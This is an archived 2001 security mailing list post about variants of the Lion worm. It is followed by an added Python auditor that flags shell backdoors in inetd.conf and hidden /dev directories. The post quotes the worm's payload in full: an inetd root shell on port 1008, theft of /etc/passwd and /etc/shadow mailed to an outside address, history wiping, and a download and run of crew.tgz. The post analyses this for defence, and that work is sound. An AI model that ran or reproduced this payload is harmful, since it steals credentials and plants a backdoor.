Security Incidents mailing list archives

Re: Lion Worm/crew.tgz


From: David Brumley <dbrumley () RTFM STANFORD EDU>
Date: Fri, 23 Mar 2001 13:36:50 -0800

Neil Long <neil.long () computing-services oxford ac uk> mailed me and
mentioned that it might be worth pointing out that the SANS GIAC analysis
is not valid for the crew.tgz version that was sent to Incidents by
Andreas Östling <andreaso () IT SU SE>

There is no t0rn rootkit involved and the root shell is on 1008 so their
Lionfind may be misleading.

Of course, there could be half a dozen variants on the loose by this stage.
                                  ^^^^^^^^^^^^^^

In February we saw the following exploit (one line in the original, broken
here at command boundaries):
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PATH;
export TERM=vt100;
rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;
killall -HUP inetd;
ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat /etc/shadow >>1i0n;
mail 1i0nip () china com <1i0n;rm -fr 1i0n;
rm -fr /.bash_history;
lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;
tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit;

The tar file did contain t0rn.  This is why the sort of tools SANS
released are good heuristics, but not definitive.  The same can be
said for rootkit scanners, IDS systems, and just about anything else.

ho hum.
-djb
--
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
David Brumley - Stanford Computer Security -   dbrumley at Stanford.EDU
Phone: +1-650-723-2445           WWW: http://www.stanford.edu/~dbrumley
Fax:   +1-650-725-9121  PGP: finger dbrumley-pgp at sunset.Stanford.EDU
#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#
Life is a whim of several billion cells to be you for a while.
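The point of the post is that a scanner keyed to one variant's port number (Lionfind) misses a variant that puts the root shell on 1008. The following is an added example, not code from the original post or from any of the tools it mentions: an inetd.conf audit that flags what both variants have in common (an inetd entry that spawns an interactive shell, especially as root on a raw port number) instead of a hard-coded port, plus a check for dot-prefixed entries under /dev such as the /dev/.lib directory the payload creates. The sample inetd.conf text and the function names (audit_inetd_conf, hidden_dev_entries, scan_dev) are constructed for this example.

```python
"""
Audit inetd.conf for shell backdoor entries and /dev for hidden
directories, keyed on behaviour rather than on a single port number.

Added example; not code from the original post. The sample inetd.conf
below is constructed for illustration.
"""
import os
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: three ordinary tcpd-wrapped services plus two
# backdoor entries. Only the 1008 line is taken from the worm payload
# quoted in the post; the second is a made-up variant on another port.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
1008 stream tcp nowait root /bin/sh sh
39168 stream tcp nowait root /bin/sh sh
"""

# Programs that inetd should never be handing a socket to directly.
SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash"}


@dataclass
class Finding:
    lineno: int
    service: str
    user: str
    program: str
    reason: str


def parse_inetd_line(line: str) -> Optional[Dict[str, object]]:
    """Split one inetd.conf entry into its fixed fields.

    Format: service socket-type protocol wait/nowait user server-program [args]
    Returns None for lines that do not have the six mandatory fields.
    """
    fields = line.split()
    if len(fields) < 6:
        return None
    return {"service": fields[0], "socktype": fields[1], "proto": fields[2],
            "wait": fields[3], "user": fields[4], "program": fields[5],
            "args": fields[6:]}


def audit_inetd_conf(text: str) -> List[Finding]:
    """Return entries that spawn a shell, or run as root on a numeric port.

    Neither test depends on which port a particular variant chose, so an
    entry on 1008 and an entry on any other port are caught the same way.
    """
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entry = parse_inetd_line(line)
        if entry is None:
            continue
        prog_base = os.path.basename(str(entry["program"]))
        service, user = str(entry["service"]), str(entry["user"])
        reasons = []
        if prog_base in SHELLS:
            reasons.append("server program is an interactive shell")
        if service.isdigit() and user == "root":
            reasons.append("root service bound by raw port number, not a name")
        if reasons:
            findings.append(Finding(lineno, service, user,
                                    str(entry["program"]), "; ".join(reasons)))
    return findings


def hidden_dev_entries(names: List[str]) -> List[str]:
    """Dot-prefixed names under /dev (excluding . and ..), which have no
    business there on a normal system; the payload creates /dev/.lib."""
    return sorted(n for n in names if n.startswith(".") and n not in (".", ".."))


def scan_dev(dev_path: str = "/dev") -> List[str]:
    """Filesystem wrapper around hidden_dev_entries for a live host."""
    try:
        return hidden_dev_entries(os.listdir(dev_path))
    except OSError:
        return []


if __name__ == "__main__":
    for f in audit_inetd_conf(SAMPLE_INETD_CONF):
        print(f"inetd.conf line {f.lineno}: {f.service} -> {f.program} "
              f"as {f.user} ({f.reason})")
    for name in scan_dev():
        print(f"hidden entry under /dev: {name}")
```

Run it as a script to audit the constructed sample and the local /dev; to audit a real host, pass the contents of its /etc/inetd.conf to audit_inetd_conf. As with the tools the post discusses, this is a heuristic: an attacker can rename the shell or use a named service, so treat a clean result as absence of this particular signature, not as a clean host.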

